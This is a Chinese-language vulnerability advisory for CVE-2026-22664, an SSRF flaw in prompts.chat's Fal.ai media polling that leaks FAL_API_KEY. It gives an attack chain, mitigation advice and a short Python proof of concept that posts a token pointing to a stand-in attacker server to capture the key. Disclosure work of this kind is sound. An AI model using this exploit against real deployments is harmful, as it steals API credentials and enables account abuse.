IPBUF安全漏洞报告
English
CVE-2026-22664 CVSS 7.7 高危

CVE-2026-22664 prompts.chat存在SSRF漏洞

披露日期: 2026-04-03

漏洞信息

漏洞编号
CVE-2026-22664
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.7 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
prompts.chat

相关标签

SSRFprompts.chatFal.ai凭证窃取信息泄露

漏洞概述

prompts.chat 在提交 30a8f04 之前的版本中存在服务器端请求伪造(SSRF)漏洞。该漏洞位于 Fal.ai 媒体状态轮询功能中,允许经过身份验证的用户通过在 token 参数中提供攻击者控制的 URL 来执行任意出站请求。攻击者利用缺乏 URL 验证的缺陷,可以披露 Authorization header 中的 FAL_API_KEY,从而实现凭据窃取、内网探测并滥用受害者的 Fal.ai 账户。

技术细节

该漏洞的根本原因是 prompts.chat 组件在集成 Fal.ai 服务进行媒体状态查询时,未能对输入参数实施严格的服务器端校验。具体而言,系统直接使用了用户可控的 token 参数作为目标地址发起 HTTP 请求。攻击者利用这一逻辑缺陷,构造特定的请求包,将目标 URL 指向恶意服务器。由于应用程序在请求过程中未剥离敏感的 Authorization 头部信息,导致包含 FAL_API_KEY 的凭证直接泄露给攻击者。一旦攻击者获取了该 API 密钥,不仅能够滥用受害者的 Fal.ai 配额,还能结合云环境的元数据服务或内网其他服务进行横向移动,造成更严重的数据泄露或服务中断风险。

攻击链分析

STEP 1
侦察
攻击者识别出目标正在使用存在漏洞的 prompts.chat 版本(commit 30a8f04 之前)。
STEP 2
获取权限
攻击者注册或获取一个低权限账户(满足 PR:L 要求)。
STEP 3
漏洞利用
攻击者向 Fal.ai 媒体状态轮询接口发送请求,将 token 参数设置为攻击者控制的外部 URL。
STEP 4
信息窃取
服务器端向攻击者控制的 URL 发起请求,并在 Authorization header 中携带 FAL_API_KEY,攻击者截获该密钥。
STEP 5
后渗透
利用窃取的 API 密钥访问受害者的 Fal.ai 账户,进行内网探测或进一步的恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable prompts.chat instance target_url = "http://victim-prompts-chat.com/api/media/status" # Attacker controlled server to capture the leaked FAL_API_KEY attacker_controlled_url = "http://attacker-server.com/capture" # The vulnerable parameter 'token' is used to trigger the SSRF payload = { "token": attacker_controlled_url } # Headers (Simulating a low-privilege authenticated user) headers = { "Authorization": "Bearer <low_priv_user_token>", "Content-Type": "application/json" } try: response = requests.post(target_url, json=payload, headers=headers) print(f"Request sent. Status code: {response.status_code}") print("Check attacker_server logs for the FAL_API_KEY in the Authorization header.") except Exception as e: print(f"Error: {e}")

影响范围

prompts.chat < commit 30a8f04

防御指南

临时缓解措施
建议立即将 prompts.chat 更新至包含提交 30a8f04 的最新版本。如果无法立即更新,应在网络防火墙或应用网关处限制出站流量的目标地址,仅允许访问必要的 Fal.ai 官方域名,并密切监控包含敏感 API Key 的异常出站请求日志。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表